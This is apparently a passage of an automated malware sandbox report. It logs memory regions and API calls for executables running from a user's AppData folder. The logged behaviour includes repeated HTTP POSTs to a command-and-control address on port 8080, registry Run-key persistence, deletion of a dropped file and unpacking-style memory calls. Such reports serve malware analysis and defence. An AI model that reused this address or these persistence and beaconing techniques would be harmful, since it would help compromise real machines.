| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| npmproxy.dll | 0x74670000 | 0x74677fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x74680000 | 0x7468dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x74690000 | 0x74695fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x746a0000 | 0x746affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sensapi.dll | 0x746b0000 | 0x746b5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rtutils.dll | 0x746c0000 | 0x746ccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x746d0000 | 0x746d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x746e0000 | 0x746fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x74700000 | 0x74743fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x74750000 | 0x7478afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74790000 | 0x747a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x747b0000 | 0x747c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x747d0000 | 0x747dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x747e0000 | 0x747eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x767a0000 | 0x76822fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| normaliz.dll | 0x770a0000 | 0x770a2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007ef9e000 | 0x7ef9e000 | 0x7efa0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 4 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Threads
Thread 0x858
35
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\user32.dll, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac8 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\OverloadGabriola.exe |
|
1 | |
| Module | Unmap | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Mutex | Release | - |
|
1 | |
| System | Get Time | type = Ticks, time = 177716 |
|
1 |
Thread 0x710
5
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 178730 |
|
1 | |
| System | Get Time | type = Ticks, time = 182723 |
|
1 | |
| System | Get Time | type = Ticks, time = 184096 |
|
1 | |
| System | Get Time | type = Ticks, time = 185875 |
|
1 | |
| System | Get Time | type = Ticks, time = 187201 |
|
1 |
Thread 0x458
14
22
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 179728 |
|
1 | |
| System | Get Time | type = Ticks, time = 180727 |
|
1 | |
| System | Get Time | type = Ticks, time = 181725 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 68724, size_out = 68724 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 184798 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 68724, size_out = 68724 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 |
Process #9: hytmjoxhrtf.exe
28
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\hyTmJoXHrTF.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:22, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x894 |
| Parent PID | 0x734 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
890
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001d2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001edfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
- |
| hytmjoxhrtf.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| locale.nls | 0x00430000 | 0x00496fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x006a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00830fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x01c3ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001c40000 | 0x01c40000 | 0x01cbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001df0000 | 0x01df0000 | 0x01e2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001e30000 | 0x01e30000 | 0x02222fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02230000 | 0x024fefff | Memory Mapped File | Readable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0x890
28
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\user32.dll, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
